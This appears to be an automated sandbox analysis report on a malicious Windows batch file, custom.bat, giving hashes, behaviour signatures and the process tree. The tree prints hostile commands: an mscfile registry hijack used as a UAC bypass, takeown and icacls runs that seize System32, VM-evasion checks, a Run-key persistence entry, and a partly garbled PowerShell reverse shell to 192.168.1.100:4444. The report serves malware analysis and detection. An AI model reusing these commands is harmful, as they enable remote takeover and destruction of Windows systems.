Analysis

  • max time kernel
    139s
  • max time network
    142s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    08/09/2024, 06:47

General

  • Target
    custom.bat
  • Size
    4KB
  • MD5
    1c63745d54962d205bb3ae879bea1ed4
  • SHA1
    a832c894a4e2b6d486c48b9ea6ec79d94df9537e
  • SHA256
    396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
  • SHA512
    129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
  • SSDEEP
    96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Gathers system information 1 TTPs 3 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Windows\system32\mode.com
      mode con: cols=800 lines=60
      2⤵
      PID:3236
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4840
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        2⤵
        • Delays execution with timeout.exe
        PID:728
      • C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
        2⤵
        • Modifies registry class
        PID:2740
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:624
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\* /r /d y
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:3100
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\* /grant Admin:F /t /c
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1196
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        2⤵
        • Delays execution with timeout.exe
        PID:2860
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\Software\Classes\mscfile" /f
        2⤵
        • Modifies registry class
        PID:3196
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:4796
      • C:\Windows\system32\findstr.exe
        findstr /i "VirtualBox"
        2⤵
        PID:2184
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:2912
      • C:\Windows\system32\findstr.exe
        findstr /i "VMware"
        2⤵
        PID:1016
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:920
      • C:\Windows\system32\findstr.exe
        findstr /i "Hyper-V"
        2⤵
        PID:1160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2304
      • C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
        2⤵
        • Adds Run key to start application
        PID:4948
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\* /r /d y
        2⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4520
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\* /grant Admin:F /t /c
        2⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3596

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize
    2KB
    MD5
    5f4c933102a824f41e258078e34165a7
    SHA1
    d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
    SHA256
    d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
    SHA512
    a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    1KB
    MD5
    d405540758f0f5bdaab94f1a054cc67d
    SHA1
    07e307420a26d17c2dc1226af6e72018da4ae26c
    SHA256
    2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61
    SHA512
    59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l52g0prf.5gj.ps1
    Filesize
    60B
    MD5
    d17fe0a3f47be24a6453e9ef58c94641
    SHA1
    6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256
    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512
    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Local\Temp\full_destruction.bat
    Filesize
    285B
    MD5
    4577f08330df24a350ff523ec87bf38e
    SHA1
    5bd1a1b1b8ca3b007102a75f7abaf72348955cf2
    SHA256
    5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae
    SHA512
    ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2
  • memory/4840-0-0x00007FFDAEE53000-0x00007FFDAEE55000-memory.dmp
    Filesize
    8KB
  • memory/4840-1-0x0000014D10B10000-0x0000014D10B32000-memory.dmp
    Filesize
    136KB
  • memory/4840-10-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp
    Filesize
    10.8MB
  • memory/4840-11-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp
    Filesize
    10.8MB
  • memory/4840-12-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp
    Filesize
    10.8MB
  • memory/4840-15-0x00007FFDAEE50000-0x00007FFDAF912000-memory.dmp
    Filesize
    10.8MB